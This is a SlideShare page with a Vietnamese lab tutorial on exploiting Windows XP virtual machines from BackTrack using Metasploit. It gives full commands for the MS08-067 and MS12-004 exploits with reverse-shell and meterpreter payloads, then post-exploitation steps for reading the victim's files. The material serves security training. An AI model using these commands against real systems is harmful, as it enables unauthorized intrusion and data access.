SlideShare una empresa de Scribd logo
1 de 10
Descargar para leer sin conexión
I. Khai thác lỗ hổng trên Windows XP với mã lỗi ms08_067
Chuẩn bị 2 máy ảo: Windows XP (nạn nhân) và máy Back Track 5r3 (máy tấn công
nạn nhân)
Trên máy Back Track cấu hình địa chỉ IP trong bài lab này cho máy là:
192.168.154.128
Các bước thực hiện:
Kiểm tra mạng giữa XP và máy Back Track 5r3:
Máy Back Track 5r3:
Máy Xp:
Kiểm tra thông mạng:
Trên máy Back track 5r3 ta gõ đường dẫn:
cd /pentest/exploits/framework
Ta tiếp tục gõ lệnh:
./msfcli windows/smb/ms08_067_netapi RHOST=192.168.154.129
LHOST=192.168.154.128 PAYLOAD=windows/shell/reverse_tcp E
Trong đó RHOST là IP máy Xp, LHOST là IP máy Back track 5r3.
Sau đó, ta chờ cho máy Back track 5r3 tấn công Xp
Cuối cùng ta đã tấn công được Xp, ta biết được các thông số của máy Xp
.
II. Khai thác lỗ hổng trên Windows XP với mã lỗi MS12_004
Máy Backtrack 5r3 có IP là 192.168.1.2, máy xp có IP là 192.168.1.3
Trên máy Back track vào chương trình terminal và gõ lệnh msfconsole
Tìm mã lỗi bằng công cụ metaploit bằng cách gõ lệnh search ms12_004
Sau khi seach được mã lỗi ta dùng lệnh use và copy mã lỗi đã tìm được.
Dùng lệnh show options để biết thêm các câu lệnh cần thiết.
Dùng lệnh SRVHOST <địa chỉ ip máy backtrack>
Dùng lệnh set PAYLOAD windows/meterpreter/preverse_tcp
Dùng lệnh set LHOST <ip backtrack>
Dùng lệnh exploit để tiến hành khai thác lỗi. Chú ý đường dẫn
http://192.168.1.2:8080/nếu máy nạn nhân vào đường dẫn này sẽ bị hack.
Trở lại máy Windows XP. Kiểm tra địa chỉ IP máy XP. Với địa chỉ ip máy XP là
192.168.1.3
Trên máy XP ta vào trình duyệt web và gõ đường dẫnhttp://192.168.1.2:8080/
Trên máy Back Track bắt đầu nhận thấy có sự kết nối đến địa chỉ
Và nhận thấy có địa chỉ kết nối vào. Và tạo phiên kết nối vào nó.
Trên máy back track ta gõ lệnh sessions để kiểm tra.
Dùng lệnh sessions –i 1
Xem trước thông tin XP:
Trên máy backtrack gõ getuid để biết thông tin máy Xp, và tài khoản đang truy
cập.
Gõ sysinfo để biết thông tin chi tiết máy Xp:
Gõ lệnh shell để vào ổ đĩa máy XP:
Giờ thì ta có thể xem được các file trong ổ đĩa của máy XP.

Más contenido relacionado

Destacado

Bảng tra cứu các phần tử bán dẫn và linh kiện điện tử
Bảng tra cứu các phần tử bán dẫn và linh kiện điện tửBảng tra cứu các phần tử bán dẫn và linh kiện điện tử
Bảng tra cứu các phần tử bán dẫn và linh kiện điện tửMr Giap
 
System hacking
System hackingSystem hacking
System hackingPhuong Ngo
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tapPhuong Ngo
 
[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng PhongPhong Hoang
 
Báo cáo System hacking
Báo cáo System hackingBáo cáo System hacking
Báo cáo System hackingHuynh Khang
 
Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms)     Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms) Pham Viet Dung
 
Tong Quan Ve Malware
Tong Quan Ve MalwareTong Quan Ve Malware
Tong Quan Ve Malwareguest4a3ff91
 
Slide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaSlide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaCon Ranh
 
BÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬP
BÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬPBÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬP
BÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬPphanconghien
 
Monitor theo doi_benh_nhan
Monitor theo doi_benh_nhanMonitor theo doi_benh_nhan
Monitor theo doi_benh_nhanLệnh Xung
 
Charlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe HackingCharlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe HackingPhilip Young
 
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...Danh Tran
 
Báo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳBáo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳthanhthong1210
 
Tính toán điện trở cho led
Tính toán điện trở cho ledTính toán điện trở cho led
Tính toán điện trở cho ledtrungnb22
 
ở đâY là những mạch ứng dụng tham khảo trong thiết kế mạch nguồn cho mạch như...
ở đâY là những mạch ứng dụng tham khảo trong thiết kế mạch nguồn cho mạch như...ở đâY là những mạch ứng dụng tham khảo trong thiết kế mạch nguồn cho mạch như...
ở đâY là những mạch ứng dụng tham khảo trong thiết kế mạch nguồn cho mạch như...Dan Vu
 
chứng khoán việt nam 2000-nay
chứng khoán việt nam 2000-naychứng khoán việt nam 2000-nay
chứng khoán việt nam 2000-nayKhanh Nhi Nguyen
 
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmp
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmpgiai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmp
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmpPham Huynh
 

Destacado (20)

Bảng tra cứu các phần tử bán dẫn và linh kiện điện tử
Bảng tra cứu các phần tử bán dẫn và linh kiện điện tửBảng tra cứu các phần tử bán dẫn và linh kiện điện tử
Bảng tra cứu các phần tử bán dẫn và linh kiện điện tử
 
System Hacking
System HackingSystem Hacking
System Hacking
 
System hacking
System hackingSystem hacking
System hacking
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tap
 
Bao cao
Bao caoBao cao
Bao cao
 
[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong
 
Báo cáo System hacking
Báo cáo System hackingBáo cáo System hacking
Báo cáo System hacking
 
Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms)     Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms)
 
Tong Quan Ve Malware
Tong Quan Ve MalwareTong Quan Ve Malware
Tong Quan Ve Malware
 
Slide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaSlide Báo cáo thực tập athena
Slide Báo cáo thực tập athena
 
BÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬP
BÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬPBÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬP
BÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬP
 
Monitor theo doi_benh_nhan
Monitor theo doi_benh_nhanMonitor theo doi_benh_nhan
Monitor theo doi_benh_nhan
 
Charlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe HackingCharlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe Hacking
 
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
 
Báo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳBáo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳ
 
Tính toán điện trở cho led
Tính toán điện trở cho ledTính toán điện trở cho led
Tính toán điện trở cho led
 
ở đâY là những mạch ứng dụng tham khảo trong thiết kế mạch nguồn cho mạch như...
ở đâY là những mạch ứng dụng tham khảo trong thiết kế mạch nguồn cho mạch như...ở đâY là những mạch ứng dụng tham khảo trong thiết kế mạch nguồn cho mạch như...
ở đâY là những mạch ứng dụng tham khảo trong thiết kế mạch nguồn cho mạch như...
 
chứng khoán việt nam 2000-nay
chứng khoán việt nam 2000-naychứng khoán việt nam 2000-nay
chứng khoán việt nam 2000-nay
 
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmp
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmpgiai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmp
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmp
 
Virus
VirusVirus
Virus
 

Más de Hoàng Hữu Hậu (19)

Backup and restore
Backup and restoreBackup and restore
Backup and restore
 
client to site
 client to site client to site
client to site
 
Mail trên vps
Mail trên vpsMail trên vps
Mail trên vps
 
Dang ky domain
Dang ky domainDang ky domain
Dang ky domain
 
Tạo web jommla
Tạo web jommlaTạo web jommla
Tạo web jommla
 
Routing
RoutingRouting
Routing
 
Dns
DnsDns
Dns
 
Dhcp
DhcpDhcp
Dhcp
 
Vpn site to site
Vpn site to siteVpn site to site
Vpn site to site
 
Share permission
Share permissionShare permission
Share permission
 
Home folder userprofile
Home folder userprofileHome folder userprofile
Home folder userprofile
 
Group policy management
Group policy managementGroup policy management
Group policy management
 
File server resource manager
File server resource managerFile server resource manager
File server resource manager
 
Domain
DomainDomain
Domain
 
Disk quota
Disk quotaDisk quota
Disk quota
 
Ntfs permission
Ntfs permissionNtfs permission
Ntfs permission
 
Local security policy
Local security policyLocal security policy
Local security policy
 
Local policy
 Local policy Local policy
Local policy
 
Local user & group
Local user & groupLocal user & group
Local user & group
 

Tấn công lỗ hỏng ms12 004 & ms08 067

  • 1. I. Khai thác lỗ hổng trên Windows XP với mã lỗi ms08_067 Chuẩn bị 2 máy ảo: Windows XP (nạn nhân) và máy Back Track 5r3 (máy tấn công nạn nhân) Trên máy Back Track cấu hình địa chỉ IP trong bài lab này cho máy là: 192.168.154.128 Các bước thực hiện: Kiểm tra mạng giữa XP và máy Back Track 5r3: Máy Back Track 5r3: Máy Xp: Kiểm tra thông mạng:
  • 2. Trên máy Back track 5r3 ta gõ đường dẫn: cd /pentest/exploits/framework Ta tiếp tục gõ lệnh: ./msfcli windows/smb/ms08_067_netapi RHOST=192.168.154.129 LHOST=192.168.154.128 PAYLOAD=windows/shell/reverse_tcp E
  • 3. Trong đó RHOST là IP máy Xp, LHOST là IP máy Back track 5r3. Sau đó, ta chờ cho máy Back track 5r3 tấn công Xp Cuối cùng ta đã tấn công được Xp, ta biết được các thông số của máy Xp
  • 4. . II. Khai thác lỗ hổng trên Windows XP với mã lỗi MS12_004 Máy Backtrack 5r3 có IP là 192.168.1.2, máy xp có IP là 192.168.1.3 Trên máy Back track vào chương trình terminal và gõ lệnh msfconsole Tìm mã lỗi bằng công cụ metaploit bằng cách gõ lệnh search ms12_004
  • 5. Sau khi seach được mã lỗi ta dùng lệnh use và copy mã lỗi đã tìm được. Dùng lệnh show options để biết thêm các câu lệnh cần thiết.
  • 6. Dùng lệnh SRVHOST <địa chỉ ip máy backtrack> Dùng lệnh set PAYLOAD windows/meterpreter/preverse_tcp Dùng lệnh set LHOST <ip backtrack>
  • 7. Dùng lệnh exploit để tiến hành khai thác lỗi. Chú ý đường dẫn http://192.168.1.2:8080/nếu máy nạn nhân vào đường dẫn này sẽ bị hack. Trở lại máy Windows XP. Kiểm tra địa chỉ IP máy XP. Với địa chỉ ip máy XP là 192.168.1.3 Trên máy XP ta vào trình duyệt web và gõ đường dẫnhttp://192.168.1.2:8080/
  • 8. Trên máy Back Track bắt đầu nhận thấy có sự kết nối đến địa chỉ Và nhận thấy có địa chỉ kết nối vào. Và tạo phiên kết nối vào nó. Trên máy back track ta gõ lệnh sessions để kiểm tra.
  • 9. Dùng lệnh sessions –i 1 Xem trước thông tin XP: Trên máy backtrack gõ getuid để biết thông tin máy Xp, và tài khoản đang truy cập.
  • 10. Gõ sysinfo để biết thông tin chi tiết máy Xp: Gõ lệnh shell để vào ổ đĩa máy XP: Giờ thì ta có thể xem được các file trong ổ đĩa của máy XP.